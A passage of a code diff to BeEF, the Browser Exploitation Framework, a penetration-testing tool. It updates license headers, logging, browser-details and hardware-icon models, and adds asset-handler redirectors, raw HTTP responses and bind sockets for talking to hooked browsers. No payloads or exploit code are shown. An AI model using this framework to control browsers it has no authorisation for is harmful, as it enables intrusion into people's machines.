-         key = BeEF::Module.get_key_by_database_id(command.command_module_id) 
-         command_module = BeEF::Core::Command.const_get(BeEF::Core::Configuration.instance.get("beef.module.#{key}.class")).new(key)
      end
-
-      command_module.command_id = command.id
-      command_module.session_id = hooked_browser.session
-      command_module.build_datastore(command.data)
-      command_module.pre_send
-
-      build_missing_beefjs_components(command_module.beefjs_components) if not command_module.beefjs_components.empty?
-
-      @body << command_module.output + "\n\n"
-      
-      # @note prints the event to the console
-      if BeEF::Settings.console?
-      name = command_module.friendlyname || kclass
-      print_info "Hooked browser #{hooked_browser.ip} has been sent instructions from command module '#{name}'"
-      end
-
-      # @note flag that the command has been sent to the hooked browser
-      command.instructions_sent = true 
-      command.save
    end
-
  end
-
-end
-end
-end
 end
--- a/core/main/logger.rb
+++ b/core/main/logger.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
@@ -24,6 +14,10 @@ module Core
    # Constructor
    def initialize
      @logs = BeEF::Core::Models::Log
+      @config = BeEF::Core::Configuration.instance
+
+      # if notifications are enabled create a new instance
+      @notifications = BeEF::Extension::Notifications::Notifications unless @config.get('beef.extension.notifications.enable') == false
    end
  
    # Registers a new event in the logs
@@ -34,14 +28,21 @@ module Core
    def register(from, event, hb = 0)
      # type conversion to enforce standards
      hb = hb.to_i
+
+      # get time now
+      time_now = Time.now
      
      # arguments type checking
      raise Exception::TypeError, '"from" needs to be a string' if not from.string?
      raise Exception::TypeError, '"event" needs to be a string' if not event.string?
      raise Exception::TypeError, '"Hooked Browser ID" needs to be an integer' if not hb.integer?
-      
      # logging the new event into the database
-      @logs.new(:type => "#{from}", :event => "#{event}", :date => Time.now, :hooked_browser_id => hb).save
+      @logs.new(:type => "#{from}", :event => "#{event}", :date => time_now, :hooked_browser_id => hb).save
+      print_debug "Event: #{event}"
+      # if notifications are enabled send the info there too
+      if @notifications
+        @notifications.new(from, event, time_now, hb)
+      end
      
      # return
      true
--- a/core/main/migration.rb
+++ b/core/main/migration.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
--- a/extensions/initialization/models/browserdetails.rb
+++ b/extensions/initialization/models/browserdetails.rb
@@ -1,21 +1,10 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Extension
-module Initialization
+module Core
 module Models
  #
  # Table stores the details of browsers.
@@ -26,16 +15,7 @@ module Models
  
    include DataMapper::Resource
    
-    storage_names[:default] = 'extension_initialization_browserdetails'
-    
-
-    #
-    # Class constructor
-    #
-    def initialize(config)
-      super(config)
-    end
-  
+    storage_names[:default] = 'core_browserdetails'
    property :session_id, String, :length => 255, :key => true
    property :detail_key, String, :length => 255, :lazy => false, :key => true
    property :detail_value, Text, :lazy => false  
@@ -59,7 +39,7 @@ module Models
      return nil if not get(session_id, detail_key).nil?
    
      # store the returned browser details
-      browserdetails = BeEF::Extension::Initialization::Models::BrowserDetails.new(
+      browserdetails = BeEF::Core::Models::BrowserDetails.new(
              :session_id => session_id,
              :detail_key => detail_key,
              :detail_value => detail_value)
@@ -72,7 +52,7 @@ module Models
    
      browserdetails
    end
-  
+ 
    #
    # Returns the icon representing the browser type the
    # hooked browser is using (i.e. Firefox, Internet Explorer)
@@ -100,24 +80,53 @@ module Models
      
      return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil?
      return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR
+      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
      return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
      return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
      return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
      return BeEF::Core::Constants::Os::OS_OPENBSD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_OPENBSD_UA_STR
-      return BeEF::Core::Constants::Os::OS_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
-      return BeEF::Core::Constants::Os::OS_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
-      return BeEF::Core::Constants::Os::OS_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
+      return BeEF::Core::Constants::Os::OS_WEBOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WEBOS_UA_STR
+      return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
+      return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
+      return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
      return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
      return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
      return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
-      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
    
      BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
    end
  
+    #
+    # Returns the icon representing the hardware the
+    # zombie is running on (i.e. iPhone, BlackBerry)
+    #
+    def self.hw_icon(session_id)
+
+      ua_string = get(session_id, 'BrowserReportedName')
+      hardware  = get(session_id, 'Hardware')
+      return BeEF::Core::Constants::Hardware::HW_VM_IMG if hardware =~ /Virtual Machine/
+      return BeEF::Core::Constants::Hardware::HW_LAPTOP_IMG if hardware =~ /Laptop/
+      return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
+
+      return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_ZUNE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ZUNE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_BLACKBERRY_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPHONE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPAD_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPOD_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_KINDLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_KINDLE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_NOKIA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_NOKIA_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_MOTOROLA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_MOTOROLA_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_HTC_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_HTC_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_GOOGLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_GOOGLE_UA_STR
+	return BeEF::Core::Constants::Hardware::HW_ERICSSON_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ERICSSON_UA_STR
+
+      BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG
+
+    end
+
  end

 end
 end
 end
-end
--- a/core/main/models/command.rb
+++ b/core/main/models/command.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
@@ -65,11 +55,11 @@ module Models
      command.save

      # @note log that the result was returned
-      BeEF::Core::Logger.instance.register('Command', "Hooked browser #{hooked_browser.ip} has executed instructions from command module '#{command_friendly_name}'", hooked_browser_id)
+      BeEF::Core::Logger.instance.register('Command', "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']", hooked_browser_id)

      # @note prints the event into the console
      if BeEF::Settings.console?
-        print_info "Hooked browser #{hooked_browser.ip} has executed instructions from command module '#{command_friendly_name}'"
+        print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']"
      end
    end

--- a/core/main/models/commandmodule.rb
+++ b/core/main/models/commandmodule.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
@@ -28,8 +18,6 @@ module Models
    property :path, Text, :lazy => false
  
    has n, :commands
-    has 1, :dynamic_command_info
-  
  end
  
 end
--- a/core/main/models/dynamiccommandinfo.rb
+++ b/core/main/models/dynamiccommandinfo.rb
@@ -1,36 +0,0 @@
-#
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
-#
-module BeEF
-module Core
-module Models
-
-  class DynamicCommandInfo
-  
-    include DataMapper::Resource
-  
-    storage_names[:default] = 'core_dynamiccommandinfo'
-  
-  	property :id, Serial
-    property :name, Text, :lazy => false
-    property :description, Text, :lazy => false
-  	property :targets, Text, :lazy => false
-  	belongs_to :command_module
-  
-  end
-
-end
-end
-end
--- a/core/main/models/dynamicpayloadinfo.rb
+++ b/core/main/models/dynamicpayloadinfo.rb
@@ -1,38 +0,0 @@
-#
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
-#
-module BeEF
-module Core
-module Models
-
-  class DynamicPayloadInfo
-  
-    include DataMapper::Resource
-  
-    storage_names[:default] = 'core_dynamicpayloadinfo'
-  
-    property :id, Serial
-    property :name, String, :length => 30
-    property :value, String, :length => 255
-    property :required, Boolean, :default => false
-    property :description, Text, :lazy => false
-  
-    belongs_to :dynamic_payloads
-  
-  end
-
-end
-end
-end
--- a/core/main/models/dynamicpayloads.rb
+++ b/core/main/models/dynamicpayloads.rb
@@ -1,35 +0,0 @@
-#
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
-#
-module BeEF
-module Core
-module Models
-
-  class DynamicPayloads
-  
-    include DataMapper::Resource
-  
-    storage_names[:default] = 'core_dynamicpayloads'
-  
-    property :id, Serial
-    property :name, Text, :lazy => false
-  
-  	has n, :dynamic_payload_info
-  
-  end
-
-end
-end
-end
--- a/core/main/models/hookedbrowser.rb
+++ b/core/main/models/hookedbrowser.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
--- a/core/main/models/log.rb
+++ b/core/main/models/log.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
--- a/core/main/models/optioncache.rb
+++ b/core/main/models/optioncache.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
--- a/core/main/models/result.rb
+++ b/core/main/models/result.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
--- a/core/main/models/user.rb
+++ b/core/main/models/user.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
--- a/core/main/network_stack/api.rb
+++ b/core/main/network_stack/api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
--- a/core/main/network_stack/assethandler.rb
+++ b/core/main/network_stack/assethandler.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
@@ -29,10 +19,43 @@ module Handlers
    # Starts the AssetHandler instance
    def initialize
      @allocations = {}
+      @sockets = {}
      @http_server = BeEF::Core::Server.instance
      @root_dir = File.expand_path('../../../../', __FILE__)
    end

+    # Binds a redirector to a mount point
+    # @param [String] target The target for the redirector
+    # @param [String] path An optional URL path to mount the redirector to (can be nil for a random path)
+    # @return [String] URL Path of the redirector
+    # @todo This function, similar to bind(), should accept a hooked browser session to limit the mounted file to a certain session etc.
+    def bind_redirect(target, path=nil)
+      url = build_url(path,nil)
+      @allocations[url] = {'target' => target}
+      @http_server.mount(url,BeEF::Core::NetworkStack::Handlers::Redirector.new(target))
+      @http_server.remap
+      print_info "Redirector to [" + target + "] bound to url [" + url + "]"
+      url
+    end
+
+    # Binds raw HTTP to a mount point
+    # @param [Integer] status HTTP status code to return
+    # @param [String] headers HTTP headers as a JSON string to return
+    # @param [String] body HTTP body to return
+    # @param [String] path URL path to mount the asset to TODO (can be nil for random path)
+    # @todo @param [Integer] count The amount of times the asset can be accessed before being automatically unbinded (-1 = unlimited)
+    def bind_raw(status, header, body, path=nil, count=-1)
+      url = build_url(path,nil)
+      @allocations[url] = {}
+      @http_server.mount(
+        url,
+        BeEF::Core::NetworkStack::Handlers::Raw.new(status, header, body)
+      )
+      @http_server.remap
+      print_info "Raw HTTP bound to url [" + url + "]"
+      url
+    end
+
    # Binds a file to a mount point
    # @param [String] file File path to asset
    # @param [String] path URL path to mount the asset to (can be nil for random path)
@@ -56,6 +79,61 @@ module Handlers
        @allocations.delete(url)
        @http_server.unmount(url)
        @http_server.remap
+        print_info "Url [" + url + "] unmounted"
+    end
+
+    # use it like: bind_socket("irc","0.0.0.0",6667)
+    def bind_socket(name, host, port)
+      if @sockets[name] != nil
+        print_error "Bind Socket [#{name}] is already listening on [#{host}:#{port}]."
+      else
+        t = Thread.new {
+          server = TCPServer.new(host,port)
+          loop do
+            Thread.start(server.accept) do |client|
+              data = ""
+              recv_length = 1024
+              threshold = 1024 * 512
+              while (tmp = client.recv(recv_length))
+                data += tmp
+                break if tmp.length < recv_length || tmp.length == recv_length
+                # 512 KB max of incoming data
+                break if data > threshold
+              end
+              if  data.size > threshold
+                print_error "More than 512 KB of data incoming for Bind Socket [#{name}]. For security purposes client connection is closed, and data not saved."
+              else
+                @sockets[name] = {'thread' => t, 'data' => data}
+                print_info "Bind Socket [#{name}] received [#{data.size}] bytes of data."
+                print_debug "Bind Socket [#{name}] received:\n#{data}"
+              end
+              client.close
+            end
+          end
+        }
+        print_info "Bind socket [#{name}] listening on [#{host}:#{port}]."
+      end
+    end
+
+    def get_socket_data(name)
+      data = nil
+      if @sockets[name] != nil
+        data = @sockets[name]['data']
+      else
+        print_error "Bind Socket [#{name}] does not exists."
+      end
+      data
+    end
+
+    def unbind_socket(name)
+        t = @sockets[name]['thread']
+        if t.alive?
+          print_debug "Thread to be killed: #{t}"
+          Thread.kill(t)
+          print_info "Bind Socket [#{name}] killed."
+        else
+          print_info "Bind Socket [#{name}] ALREADY killed."
+        end
    end

    # Builds a URL based on the path and extension, if neither are passed a random URL will be generated
--- a/Show More
+++ b/Show More